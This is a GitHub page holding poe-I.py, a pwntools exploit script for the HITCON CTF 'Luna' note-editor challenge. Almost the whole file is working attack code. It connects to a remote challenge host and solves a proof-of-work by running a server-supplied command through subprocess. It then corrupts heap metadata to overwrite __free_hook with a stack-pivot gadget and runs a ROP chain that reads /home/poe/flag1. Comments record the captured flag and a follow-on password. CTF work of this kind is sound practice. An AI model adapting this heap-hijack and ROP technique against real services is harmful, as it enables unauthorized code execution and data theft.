-
Notifications
You must be signed in to change notification settings - Fork 27
/
Copy pathpoe-I.py
executable file
·129 lines (102 loc) · 2.5 KB
/
poe-I.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
#!/usr/bin/env python
from pwn import *
# hitcon{achievement: Defeat Luna}
'''
hitcon{achievement: Defeat Luna}
Password for PoE II: c8ecf647f0238e24cb3f96f45c7f54e2f33578d0
'''
context.arch = 'amd64'
y = remote( '13.230.132.4' , 21700 )
def insert( idx , data ):
y.sendlineafter( '>>> ' , 'i' )
y.sendline( str( idx ) )
y.sendline( data ) # 0x100
def new_tab():
y.sendlineafter( '>>> ' , 'n' )
def select( tid ):
y.sendlineafter( '>>> ' , 's' )
y.sendline( str( tid ) )
def display( idx , l ):
y.sendlineafter( '>>> ' , 'd' )
y.sendline( str( idx ) )
y.sendline( str( l ) )
def cut( idx , l ):
y.sendlineafter( '>>> ' , 'c' )
y.sendline( str( idx ) )
y.sendline( str( l ) )
def paste( idx ):
y.sendlineafter( '>>> ' , 'p' )
y.sendline( str( idx ) )
def replace( idx , l , c ):
y.sendlineafter( '>>> ' , 'r' )
y.sendline( str( idx ) )
y.sendline( str( l ) )
y.sendline( c )
def reverse( idx , l ):
y.sendlineafter( '>>> ' , 'R' )
y.sendline( str( idx ) )
y.sendline( str( l ) )
def delete( idx , l ):
y.sendlineafter( '>>> ' , 'D' )
y.sendline( str( idx ) )
y.sendline( str( l ) )
def wri( idx , data ):
for i , c in enumerate( data ):
if c == '\0':
continue
#print i , hex( ord( c ) )
replace( idx + i , 1 , c )
y.recvuntil('of:\n')
cmd = y.recvline().strip()
res = subprocess.check_output(cmd.split()).strip()
print res
y.sendline( res )
y.recvuntil( 'Luna - the Legendary Ultra Note Accelerator' )
gg = 0x4c35d8 # xchg eax, edi ; xchg eax, esp ; ret
pop_rdi = 0x4006a6
ppr = 0x44d859 # pop rdx ; pop rsi ; ret
_open = 0x44a960
read = 0x44ab20
write = 0x44abf0
ret = 0x40042e
free_hook = 0x6D9E78
p = flat(
'a' * 0x10,
p32( 0x100 ), p32( 0 ), 0, # size , id , freed
free_hook , 0,
'/home/poe/flag1\0',
pop_rdi, 0,
ppr , 0x200 , 0x6d93d0,
read
).ljust( 0xd0 , 'a' )
p += flat(
p32( 0x100 ), p32( 0 ), 0, # size , id , freed
0x6d9390 + 0x10
)
insert( 0 , p ) # 0
new_tab()
insert( 0 , 'a' * 0x18 ) # 1
cut( 0 , 0x18 )
select( 0 )
cut( 0 , 0xe0 )
new_tab()
paste( 0 )
new_tab() # realloc( ptr , 0x20 )
select( 2 )
replace( 0x60 , 1 , '\x70' )
replace( 0x68 , 1 , '\x30' )
select( 0 )
wri( 0 , p64( gg ) )
p = flat(
( pop_rdi, 0x6d9390, ppr, 0, 0, _open ) * 3, # open * 3 -> fd = 5
pop_rdi, 5,
ppr , 0x100 , 0x6d9360,
read,
pop_rdi, 1,
write,
)
select( 1 )
insert( 0 , 'a' ) # trigger __free_hook
sleep(0.7)
y.sendline( p )
y.interactive()